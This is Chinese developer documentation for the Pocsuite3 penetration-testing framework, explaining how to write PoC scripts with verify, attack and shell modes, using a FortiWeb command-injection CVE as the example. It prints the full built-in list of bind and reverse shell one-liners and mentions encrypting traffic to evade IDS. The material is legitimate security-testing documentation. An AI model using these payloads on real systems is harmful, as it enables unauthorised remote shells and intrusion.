PoC python 脚本编写步骤
本小节介绍 PoC python 脚本编写。
Pocsuite3 仅支持 Python 3.x,如若编写 Python3 格式的 PoC,需要开发者具备一定的 Python3 基础。
从 0 到 1
首先新建一个
*.py
文件,文件名应当符合 《PoC 命名规范》从
pocsuite3.api
导入待用的类和方法,编写 PoC 实现类DemoPOC
,继承自PoCBase
类。
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
class DemoPOC(POCBase):
...
- 填写 PoC 信息字段,请认真填写所有基本信息字段
TIP
这些字段都不是必须的,也可留空
vulID = '99335' # Seebug 漏洞收录 ID,如果没有则为 0
version = '1' # PoC 的版本,默认为 1
author = 'seebug' # PoC 的作者
vulDate = '2021-8-18' # 漏洞公开日期 (%Y-%m-%d)
createDate = '2021-8-20' # PoC 编写日期 (%Y-%m-%d)
updateDate = '2021-8-20' # PoC 更新日期 (%Y-%m-%d)
references = ['https://www.seebug.org/vuldb/ssvid-99335'] # 漏洞来源地址,0day 不用写
name = 'Fortinet FortiWeb 授权命令执行 (CVE-2021-22123)' # PoC 名称,建议命令方式:<厂商> <组件> <版本> <漏洞类型> <cve编号>
appPowerLink = 'https://www.fortinet.com' # 漏洞厂商主页地址
appName = 'FortiWeb' # 漏洞应用名称
appVersion = '<=6.4.0' # 漏洞影响版本
vulType = 'Code Execution' # 漏洞类型,参见漏洞类型规范表
desc = '/api/v2.0/user/remoteserver.saml接口的name参数存在命令注入' # 漏洞简要描述
samples = ['http://192.168.1.1'] # 测试样列,就是用 PoC 测试成功的目标
install_requires = ['BeautifulSoup4:bs4'] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
pocDesc = ''' poc的用法描述 '''
category = POC_CATEGORY.EXPLOITS.WEBAPP # PoC 的分类
protocol = POC_CATEGORY.PROTOCOL.HTTP # PoC 的默认协议,方便对 url 格式化
protocol_default_port = 8443 # 目标的默认端口,当提供的目标不包含端口的时候,方便对 url 格式化
dork = {'zoomeye': 'deviceState.admin.hostname'} # 搜索 dork,如果运行 PoC 时不提供目标且该字段不为空,将会调用插件从搜索引擎获取目标。
suricata_request = '''http.uri; content: "/api/v2.0/user/remoteserver.saml";''' # 请求流量 suricata 规则
suricata_response = '' # 响应流量 suricata 规则
- 编写验证模式
def _verify(self):
output = Output(self)
# 验证代码
if result: # result是返回结果
output.success(result)
else:
output.fail('target is not vulnerable')
return output
output 为 Pocsuite3 标准输出 API,如果要输出调用成功信息则使用 output.success(result)
,如果要输出调用失败则 output.fail()
,系统自动捕获异常,不需要 PoC 里处理捕获,如果 PoC 里使用 try...except
来捕获异常,可通过output.error('Error Message')
来传递异常内容,建议直接使用 PoCBase 中的 parse_output()
通用结果处理函数对 _verify
和 _attack
结果进行返回。
def _verify(self, verify=True):
result = {}
...
return self.parse_output(result)
# PoCBase
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
TIP
通过 self.parse_output(result)
返回结果,result 为字典类型。如果 result 不为空,则会返回成功信息(即 PoC 验证成功),否则返回失败。在写 PoC 时,确保验证成功后再给 result 赋值并返回即可。
- 编写攻击模式
攻击模式可以对目标进行 getshell,查询管理员帐号密码等操作,定义它的方法与验证模式类似。
def _attack(self):
output = Output(self)
result = {}
# 攻击代码
和验证模式一样,攻击成功后需要把攻击得到结果赋值给 result 变量并调用 self.parse_output(result)
返回结果。
TIP
如果该 PoC 没有攻击模式,可以在 _attack()
函数下加入一句 return self._verify()
这样你就无需再写 _attack()
函数了。
- 编写 shell 模式
Pocsuite3 在 shell 模式会默认监听 6666
端口,编写对应的攻击代码,让目标执行反向连接运行 Pocsuite3 系统 IP 的 6666
端口即可得到一个 shell。
def _shell(self):
cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
# 攻击代码 execute cmd
shell 模式下,只能运行单个 PoC 脚本,控制台会进入 shell 交互模式执行命令及输出。
从 1.8.5 版本开始,Pocsuite3 支持 bind shell。shell 模式和原来的操作方式一致,也需要指定监听 ip 和端口,监听 ip 可以是本地任意 ip,也可以是远程服务器 ip。
bind shell 的实现位于 ./pocsuite3/modules/listener/bind_tcp.py
,原理是实现了一个中间层,一端连接漏洞目标的 bind shell(如 telnet 服务、nc 启动的 shell、php 一句话等),另一端连接用户指定的监听 ip 和端口,如此一来,shell 模式可以不受网络环境限制,支持在内网使用。
目前支持三种 bind shell,使用场景如下:
bind_shell
:通用方法,在 shell 模式中直接调用 return bind_shell(self, rce_func)
即可,非常便捷。针对有回显的漏洞,在 PoC 中实现一个 rce(函数名可自定义)方法,函数参数为命令输入,输出为命令输出。如果漏洞无回显,也可以通过写一句话转为有回显的。值得一提的是,用户也可以在 rce 方法中实现流量的加解密以逃避 IDS 检测。
bind_tcp_shell
:对 tcp 绑定型 shell 的原生支持,在 shell 模式中 return bind_tcp_shell(bind_shell_ip, bind_shell_port)
bind_telnet_shell
:对 telnet 服务的原生支持,在 shell 模式中 return bind_telnet_shell(ip, port, username, password)
简单举几个例子,telnet 弱口令 shell 模式实现,实际只需要一行代码:
def _shell(self):
return bind_telnet_shell(ip, port, 'iot', '***')
php shell 模式,在目标写入一句话,然后在 _rce
方法中实现了流量的 AES 加解密:
值得一提的是,针对有回显的漏洞,只要在 PoC 中实现一个 _exploit
方法,就可轻松实现 Pocsuite3 的 _verify
、_attack
、_shell
三种模式,如下:
# 重写这个方法
def _exploit(self, cmd='id'):
result = ''
res = requests.get(self.url)
logger.debug(res.text)
result = res.text
return result
# 验证漏洞存在
def _verify(self):
result = {}
if not self._check():
return self.parse_output(result)
flag = random_str(10)
cmd = f'echo {flag}'
res = self._exploit(cmd)
if flag in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo'][cmd] = res
return self.parse_output(result)
def _options(self):
o = OrderedDict()
o['cmd'] = OptString('id', description='The command to execute')
return o
# 从命令行参数获取用户命令,并输出命令执行结果
def _attack(self):
result = {}
if not self._check():
return self.parse_output(result)
cmd = self.get_option('cmd')
res = self._exploit(cmd)
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo'][cmd] = res
return self.parse_output(result)
# 交互 shell 模式
def _shell(self):
return bind_shell(self, '_exploit')
从 1.8.6 版本开始,Pocsuite3 支持加密的 shell。PoC 中使用 openssl 的反弹命令(也可以用代码反弹),并且在运行时指定 --tls
选项。
可以看到,通信流量加密了:
Pocsuite3 自带的 Payload 如下:
In [1]: from pocsuite3.api import BIND_PAYLOAD, REVERSE_PAYLOAD
In [2]: BIND_PAYLOAD.__dict__
Out[2]:
mappingproxy({'__module__': 'pocsuite3.modules.listener.bind_tcp',
'NODE': 'node -e \'sh=child_process.spawn("/bin/sh");net.createServer(function(client){{client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);}}).listen("{0}")\'',
'NC': 'nc -l -p {0} -e /bin/sh',
'SOCAT': 'socat TCP-LISTEN:{0},reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane',
'PYTHON': 'python -c \'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0",{0}));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])\'',
'PERL': 'perl -e \'use Socket;$p={0};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){{open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");}};\'',
'PHP': 'php -r \'$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",{0});socket_listen($s,1);$cl=socket_accept($s);while(1){{if(!socket_write($cl,"$ ",2))exit;$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){{$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}}}\'',
'RUBY': 'ruby -rsocket -e \'exit if fork;s=TCPServer.new("{0}");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,"r"){{|io|c.print io.read}}end;end\'',
'NC2': 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -lvp {0} >/tmp/f',
'AWK': 'awk \'BEGIN{{s="/inet/tcp/{0}/0/0";do{{if((s|&getline c)<=0)break;if(c){{while((c|&getline)>0)print $0|&s;close(c)}}}} while(c!="exit")close(s)}}\'',
'TELNETD': 'telnetd -l /bin/sh -p {0}',
'NC3': 'rm -rf /tmp/f;mkfifo /tmp/f||mknod /tmp/f p;(nc -l -p {0}||nc -l {0})0</tmp/f|/bin/sh>/tmp/f 2>&1;rm /tmp/f',
'R': 'R -e "s<-socketConnection(port={0},blocking=TRUE,server=TRUE,open=\'r+\');while(TRUE){{writeLines(readLines(pipe(readLines(s,1))),s)}}"',
'__dict__': <attribute '__dict__' of 'BIND_PAYLOAD' objects>,
'__weakref__': <attribute '__weakref__' of 'BIND_PAYLOAD' objects>,
'__doc__': None})
In [3]: REVERSE_PAYLOAD.__dict__
Out[3]:
mappingproxy({'__module__': 'pocsuite3.modules.listener.reverse_tcp',
'NC': 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f',
'NC2': 'nc -e /bin/sh {0} {1}',
'NC3': 'rm -f /tmp/p;mknod /tmp/p p && nc {0} {1} 0/tmp/p',
'BASH0': 'sh -i >& /dev/tcp/{0}/{1} 0>&1',
'BASH': "bash -c 'sh -i >& /dev/tcp/{0}/{1} 0>&1'",
'BASH2': "bash -c 'sh -i >& /dev/tcp/{0}/{1} 0>&1'",
'TELNET': 'rm -rf /tmp/p;mkfifo /tmp/p||mknod /tmp/p p;telnet {0} {1} 0</tmp/p|/bin/sh 1>/tmp/p',
'PERL': 'perl -e \'use Socket;$i="{0}";$p={1};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}};\'',
'PYTHON': 'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{0}",{1}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'',
'PHP': 'php -r \'$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");\'',
'RUBY': 'ruby -rsocket -e \'exit if fork;c=TCPSocket.new("{0}","{1}");while(cmd=c.gets);IO.popen(cmd,"r"){{|io|c.print io.read}}end\'',
'JAVA': 'r = Runtime.getRuntime()\np = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{0}/{1};cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])\np.waitFor()',
'POWERSHELL': "$client = New-Object System.Net.Sockets.TCPClient('{0}',{1});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([textencoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()",
'OPENSSL': 'rm -rf /tmp/s;mkfifo /tmp/s||mknod /tmp/s p;/bin/sh -i </tmp/s 2>&1|openssl s_client -quiet -connect {0}:{1}>/tmp/s;rm -rf /tmp/s',
'PHP_SSL': 'php -r \'$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://{0}:{1}",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){{while($l=fgets($s)){{exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}}}\'&',
'NC4': 'nc {0} {1} -e /bin/sh',
'BASH3': "bash -c '0<&173-;exec 173<>/dev/tcp/{0}/{1};sh <&173 >&173 2>&173'",
'TELNET2': 'rm -f /tmp/p; mknod /tmp/p p && telnet {0} {1} 0/tmp/p',
'NC5': 'rm -rf /tmp/p;mkfifo /tmp/p||mknod /tmp/p p;nc {0} {1} 0</tmp/p|/bin/sh 1>/tmp/p',
'LUA': 'lua -e "local s=require(\'socket\');local t=assert(s.tcp());t:connect(\'{0}\',{1});while true do local r,x=t:receive();local f=assert(io.popen(r,\'r\'));local b=assert(f:read(\'*a\'));t:send(b);end;f:close();t:close();"',
'PERL_SSL': 'perl -e \'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"{0}:{1}",SSL_verify_mode=>0);while(sysread($c,$i,8192)){{syswrite($c,`$i`);}}\'',
'RUBY2': 'ruby -rsocket -e\'f=TCPSocket.open("{0}",{1}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\'',
'RUBY_SSL': 'ruby -rsocket -ropenssl -e \'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("{0}","{1}")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){{|io|c.print io.read}}end\'',
'NCAT_SSL': 'ncat -e /bin/sh --ssl {0} {1}',
'__dict__': <attribute '__dict__' of 'REVERSE_PAYLOAD' objects>,
'__weakref__': <attribute '__weakref__' of 'REVERSE_PAYLOAD' objects>,
'__doc__': None})
In [8]: REVERSE_PAYLOAD.BASH.format('127.0.0.1', 6666)
Out[8]: "bash -c 'sh -i >& /dev/tcp/127.0.0.1/6666 0>&1'"
- 结果返回
不管是验证模式还是攻击模式,返回结果 result 中的 key 值请按照下面的规范来写,result 各字段意义请参见《PoC 结果返回规范》
'Result': {
'DBInfo': {'Username': 'xxx', 'Password': 'xxx', 'Salt': 'xxx', 'Uid': 'xxx', 'Groupid': 'xxx'},
'ShellInfo': {'URL': 'xxx', 'Content': 'xxx'},
'FileInfo': {'Filename': 'xxx', 'Content': 'xxx'},
'XSSInfo': {'URL': 'xxx', 'Payload': 'xxx'},
'AdminInfo': {'Uid': 'xxx', 'Username': 'xxx', 'Password': 'xxx'},
'Database': {'Hostname': 'xxx', 'Username': 'xxx', 'Password': 'xxx', 'DBname': 'xxx'},
'VerifyInfo': {'URL': 'xxx', 'Postdata': 'xxx', 'Path': 'xxx'},
'SiteAttr': {'Process': 'xxx'},
'Stdout': 'result output string'
}
- 注册 PoC 实现类
在类的外部调用 register_poc()
方法注册 PoC 类
class DemoPOC(POCBase):
# POC内部代码
# 注册 DemoPOC 类
register_poc(DemoPOC)
以上,我们从 0 到 1 开发了一个 PoC,然后就是搭建漏洞靶场进行 PoC 调试了。
自动生成模版
以上过程有点繁琐,Pocsuite3 >=1.9.4
版本支持使用 -n
或 --new
参数自动生成 PoC 模版。
可阅读:实战 PoC 开发
──(kali㉿kali)-[/tmp/]
└─$ pocsuite -n
,------. ,--. ,--. ,----. {1.9.6-aad0be3}
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
| | --'' '-' \ `--.-' `' '' | | | | \ --/'-' |
`--' `---' `---`----' `----'`--' `--' `----`----' https://pocsuite.org
[*] starting at 20:40:34
You are about to be asked to enter information that will be used to create a poc template.
There are quite a few fields but you can leave some blank.
For some fields there will be a default value.
-----
Seebug ssvid (eg, 99335) [0]:
PoC author (eg, Seebug) []:
Vulnerability disclosure date (eg, 2021-8-18) [2022-07-14]:
Advisory URL (eg, https://www.seebug.org/vuldb/ssvid-99335) []:
Vulnerability CVE number (eg, CVE-2021-22123) []:
Vendor name (eg, Fortinet) []:
Product or component name (eg, FortiWeb) []:
Affected version (eg, <=6.4.0) []:
Vendor homepage (eg, https://www.fortinet.com) []:
0 Arbitrary File Read
1 Code Execution
2 Command Execution
3 Denial Of service
4 Information Disclosure
5 Login Bypass
6 Path Traversal
7 SQL Injection
8 SSRF
9 XSS
Vulnerability type, choose from above or provide (eg, 3) []:
Authentication Required (eg, yes) [no]:
PoC name [Pre-Auth Other]:
Filepath in which to save the poc [./20220714_pre-auth_other.py]
[20:40:36] [INFO] Your poc has been saved in ./20220714_pre-auth_other.py :)
...
最简化 PoC 模版
从 1.9.8
版本开始,基类 POCBase 为 PoC 的所有属性设置了默认值,写 PoC 时可以不写任何属性字段,简化 PoC 的开发。
from pocsuite3.api import *
class TestPOC(POCBase):
# 为了 PoC 的区分,建议提供 name 属性
# name = ''
def _verify(self):
result = {}
# 验证代码
return self.parse_output(result)
register_poc(TestPOC)
YAML 格式 PoC
从 2.0.0
版本开始,Pocsuite3 支持了 YAML 格式的 PoC,兼容 nuclei,可以直接使用 nuclei templates。
YAML PoC 模版开发可参考:nuclei-templating-guide。